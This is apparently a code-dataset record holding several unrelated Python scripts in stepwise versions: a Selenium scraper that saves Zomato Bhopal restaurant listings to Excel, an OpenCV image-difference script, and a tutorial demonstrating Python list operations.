1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-4": "from selenium import webdriver\nimport time\nimport xlwt\nfrom JD_PhoneNo import get_phone_no\nbook = xlwt.Workbook(encoding='utf-8')\nsheet1 = book.add_sheet('Sheet 1')\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.zomato.com/bhopal/dinner')\nz_hotel_list = []\nz_address_list = []\nz_phone_list = []\nz_rating_list = []\nz_costoftwo = []\nz_votes = []\nz_hours = []\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-5": "from selenium import webdriver\r\nimport time\r\nimport xlwt\r\nfrom JD_PhoneNo import get_phone_no\r\nbook = xlwt.Workbook(encoding=\"utf-8\")\r\nsheet1=book.add_sheet(\"Sheet 1\")\r\nbrowser = webdriver.Firefox()\r\nbrowser.get(\"https://www.zomato.com/bhopal/dinner\")\r\nz_hotel_list = []\r\nz_address_list = []\r\nz_phone_list = []\r\nz_rating_list = []\r\nz_costoftwo = []\r\nz_votes = []\r\nz_hours = []\r\n\r\ndef traverse(a,b):\r\n temp = []\r\n for i in range(a,b,1):\r\n a = str(i)\r\n button = browser.find_element_by_link_text(a)\r\n button.click()\r\n name_list = browser.find_elements_by_class_name(\"result-title.hover_feedback.zred.bold.ln24.fontsize0\")\r\n add_list = browser.find_elements_by_class_name(\"col-m-16.search-result-address.grey-text.nowrap.ln22\")\r\n phone_list = browser.find_elements_by_class_name(\"item.res-snippet-ph-info\")\r\n for i in range(1,18):\r\n if(i==4 or i==10 ):\r\n continue\r\n else:\r\n try:\r\n z_costoftwo.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[3]/div[2]/span[2]\").text)\r\n except Exception as e:\r\n z_costoftwo.append(\"NILL\")\r\n try:\r\n z_hours.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[3]/div[3]/div[1]\").text)\r\n except Exception as e1:\r\n z_hours.append(\"NILL\")\r\n try:\r\n z_votes.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span\").text)\r\n except Exception as e1:\r\n z_votes.append(\"NEW\")\r\n try:\r\n z_rating_list.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]\").text)\r\n except Exception as e:\r\n z_rating_list.append(\"NILL\")\r\n for names in name_list:\r\n z_hotel_list.append(names.text)\r\n temp.append(names.text)\r\n for addname in add_list:\r\n z_address_list.append(addname.text)\r\n for phonename in phone_list:\r\n z_phone_list.append(phonename.get_attribute(\"data-phone-no-str\"))\r\n if(int(a)<6):\r\n clk = browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]\")\r\n clk.click()\r\n else:\r\n clk = browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]\")\r\n clk.click()\r\ntraverse(1,6)\r\ntraverse(6,11)\r\ntraverse(11,16)\r\ntraverse(16,21)\r\ntraverse(21,26)\r\n# traverse(26,31)\r\n# traverse(31,36)\r\n# traverse(36,41)\r\n# traverse(41,46)\r\n# traverse(46,51)\r\n# traverse(51,56)\r\n# for i in range(1,5,10):\r\n# traverse(i,i+5)\r\n# traverse(i+5,i+10)\r\nfor i in range(0,len(z_hotel_list),1):\r\n sheet1.write(i,0,z_hotel_list[i])\r\nfor i in range(0, len(z_phone_list), 1):\r\n sheet1.write(i,1,z_phone_list[i])\r\nfor i in range(0, len(z_address_list), 1):\r\n sheet1.write(i, 2, z_address_list[i])\r\nfor i in range(0,len(z_rating_list)):\r\n sheet1.write(i,3,z_rating_list[i])\r\nfor i in range(0, len(z_costoftwo)):\r\n sheet1.write(i, 4, z_costoftwo[i])\r\nfor i in range(0, len(z_hours)):\r\n sheet1.write(i, 5, z_hours[i])\r\nfor i in range(0, len(z_votes)):\r\n sheet1.write(i, 6, 
z_votes[i])\r\n\r\nprint(\"Writing to excel Finished\")\r\nbook.save(\"ZomatoBhopal(data).xls\")\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
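The scraper above depends on long absolute XPaths and assumes each element already exists when read. A more resilient pattern uses Selenium's explicit waits; a brief sketch (standard selenium.webdriver API; newer selenium releases expose find_elements(By, ...), while older ones use the find_elements_by_* helpers shown in the record; the 10-second timeout is an arbitrary choice):

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

wait = WebDriverWait(browser, 10)
# block until at least one result title is attached to the DOM
wait.until(EC.presence_of_element_located(
    (By.CSS_SELECTOR, '.result-title.hover_feedback.zred.bold.ln24.fontsize0')))
names = [el.text for el in browser.find_elements(
    By.CSS_SELECTOR, '.result-title.hover_feedback.zred.bold.ln24.fontsize0')]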
<|reserved_special_token_0|>
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
#img3 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
    suma = 0
    x = ux - wx
    while x < ux + wx:
        y = uy - wy  # reset y for each column; otherwise the inner loop runs only once
        while y < uy + wy:
            xdx = x + dx if x + dx < img1.shape[0] else x
            ydy = y + dy if y + dy < img1.shape[1] else y
            suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
            y += 1
        x += 1
    return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0]-1):
for y in range(img1.shape[1]-1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
#cv2.imwrite("s"+str(x)+"xy.jpg", img3)
cv2.namedWindow(str(x) + "dd.jpg", cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + "dd.jpg", img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
flexible
|
{
"blob_id": "749e6a1f807843c9e2591f51561174cc51668b11",
"index": 1588,
"step-1": "<mask token>\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-3": "<mask token>\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\n#img3 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0]-1):\n for y in range(img1.shape[1]-1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n #cv2.imwrite(\"s\"+str(x)+\"xy.jpg\", img3)\n cv2.namedWindow(str(x) + \"dd.jpg\", cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + \"dd.jpg\", img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
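The pixel-by-pixel sumas above does Python-level work for every window element at every output pixel. The same windowed sum of squared differences can be vectorized with NumPy; a sketch assuming the displaced window stays inside the image (the boundary clamping of the original is omitted for brevity):

import numpy as np

def ssd_window(img_i, img_j, ux, uy, wx, wy, dx, dy):
    # SSD between the (2*wx) x (2*wy) window of img_i centred at (ux, uy)
    # and the same-sized window of img_j displaced by (dx, dy)
    a = img_i[ux - wx:ux + wx, uy - wy:uy + wy].astype(np.float64)
    b = img_j[ux - wx + dx:ux + wx + dx, uy - wy + dy:uy + wy + dy].astype(np.float64)
    return float(np.sum((a - b) ** 2))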
# Lists are sequences of objects
# Mutable
# Lists are represented within square brackets and items are separated by commas
#-----------------------------------Lists-----------------------------------#
# Lists of Numbers
print("\n1. Lists of Numbers")
print("\t" + str([1,2,3]))
# Lists of Strings
print("\n2. Lists of Strings")
print("\t" + str(["Lemon","Mango","Papaya"]))
list_fruits =["Lemon","Mango","Papaya"]
print("\tMy favorite fruit is " + list_fruits[1])
print("\n3. List operations")
#Replace items within list
list_fruits[2]="Water Melons"
print("\tNew List: " + str(list_fruits))
#Create Empty List
list_Organizations = []
print("\n5. Create empty list")
print("\tList of Organizations: " + str(list_Organizations))
#Add values to list
print("\n5. Add values to list")
list_Organizations.append("Microsoft")
list_Organizations.append("Amazon")
list_Organizations.append("Google")
print("\tAppend List of Organizations: " + str(list_Organizations))
#List of characters within string
print("\tList of characters in string:" + str(list("Sandeep Dhamale")))
# Retrieve List using for loop
print("\n6. Retrieve List using for loop")
for organization in list_Organizations:
print("\t" + organization)
# Get specific elements within list: Slicing
print("\n7. Get specific elements within list: Slicing")
list_numbers = [1,2,3,4,5]
sub_list_numbers = list_numbers[1:3]
print("\tSub list: " + str(sub_list_numbers))
print("\tLast element in list: " + str(list_numbers[-1]))
print("\tGet all elements in list except first and lasr: " + str(list_numbers[1:-1]))
print("\tElements from index 2 in list: " + str(list_numbers[2:]))
print("\tElements till index 4 in list: " + str(list_numbers[:4]))
#Copying Lists to other list - Shallow copy
print("\n8. Copying Lists to other list")
list_numbers_direct = list_numbers
print("\tUsing assignment. list_numbers_direct is list_numbers: " + str(list_numbers_direct is list_numbers))
list_numbers_list_values = list_numbers[:]
print("\tUsing a full slice. list_numbers_list_values is list_numbers: " + str(list_numbers_list_values is list_numbers))
list_numbers_copy = list_numbers.copy()
print("\tUsing copy(). list_numbers_copy is list_numbers: " + str(list_numbers_copy is list_numbers))
list_numbers_list = list(list_numbers)
print("\tUsing the list() constructor. list_numbers_list is list_numbers: " + str(list_numbers_list is list_numbers))
print("\n9. Note: Although the copies are not equal the objects inside the lists are equal")
list_of_list = [[1,2],[3,4]]
copy_list_of_list = list_of_list[:]
print("\tcopy_list_of_list is list_of_list: " + str(copy_list_of_list is list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))
print("\tEven if the values are modified e.g. append the list will be same")
list_of_list[0].append('a')
print("\tlist_of_list: " + str(list_of_list))
print("\tcopy_list_of_list: " + str(copy_list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))
print("\n10.Search in a list: list.index() - Returns the first matched element")
temp_string = "Python is easy scripting language. It is easy to learn and build apps using Python."
temp_string_list = temp_string.split(" ")
print("\tString: " + temp_string)
print("\tString list: " + str(temp_string_list))
print("\tSearch a sub string in string list using list.index(): " + str(temp_string_list.index("scripting")))
print("\n11.Count occurrence of substring in list")
print("\tCount occurrence of substring Python: " + str(temp_string_list.count("easy")))
print("\n12.Remove substring from string list")
del temp_string_list[3]
print("\tA. Remove substring from list using del (by index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
temp_string_list.remove("learn")
print("\tB. Remove substring from list using remove (by value): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
print("\n12.Insert a substring in string. list.insert()")
temp_string_list.insert(3, "scripting")
print("\tA. Insert substring to list (at index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
print("\n13.Concatenating lists.")
temp_list_1=[1,2,3]
temp_list_2 = [4,5,6]
temp_list = temp_list_1 + temp_list_2
print("\ta. temp_list = temp_list_1 + temp_list_2 = " + str(temp_list))
temp_list+=temp_list
print("\tb. temp_list += temp_list " + str(temp_list))
temp_list.extend([7,8,9])
print("\tc. temp_list.extend() " + str(temp_list))
print("\n14. Reversing lists.")
temp_list.reverse()
print("Reverse temp list: "+ str(temp_list))
print("\n15. Sorting lists.")
temp_list = [5,55,555]
temp_list.sort()
print("\tSorted list: " + str(temp_list))
temp_list.sort(reverse=True)
print("\tSorted list: " + str(temp_list))
print("\tSorting lists by callable functions (inbuilt) e.g. len using 'key")
temp_string = "I am a software tester."
temp_string_list = temp_string.split()
print("\tString list: " + str(temp_string_list))
temp_string_list.sort(key=len)
print("\tSort by length of each word: " + str(temp_string_list))
temp_number_list=[3,45,12,1,99,44]
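# temp_number_list is otherwise unused above; as an illustrative sketch, sort a
# copy of it with a lambda key (here: distance from 50) using sorted().
print("\tNumbers by distance from 50: " + str(sorted(temp_number_list, key=lambda n: abs(n - 50))))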
print("\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.")
x=[4, 9, 2, 1]
y = x
y.sort()
print("\t y= " + str(y))
print("\t x= " + str(x))
x=[4, 9, 2, 1]
print("\t y= " + str(sorted(x)))
print("\t x= " + str(x))
print("\t z= " + str(list(reversed(x))))
print("\t x= " + str(x))
|
normal
|
{
"blob_id": "4d35bb83378805daf4392a1752386ab1403404e0",
"index": 1530,
"step-1": "<mask token>\n",
"step-2": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\n<mask token>\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\n<mask token>\nprint('\\tNew List: ' + str(list_fruits))\n<mask token>\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\n<mask token>\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\n<mask token>\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\n<mask token>\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. 
list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\n<mask token>\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\n<mask token>\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\n<mask token>\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\n<mask token>\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\n<mask token>\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\n<mask token>\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n",
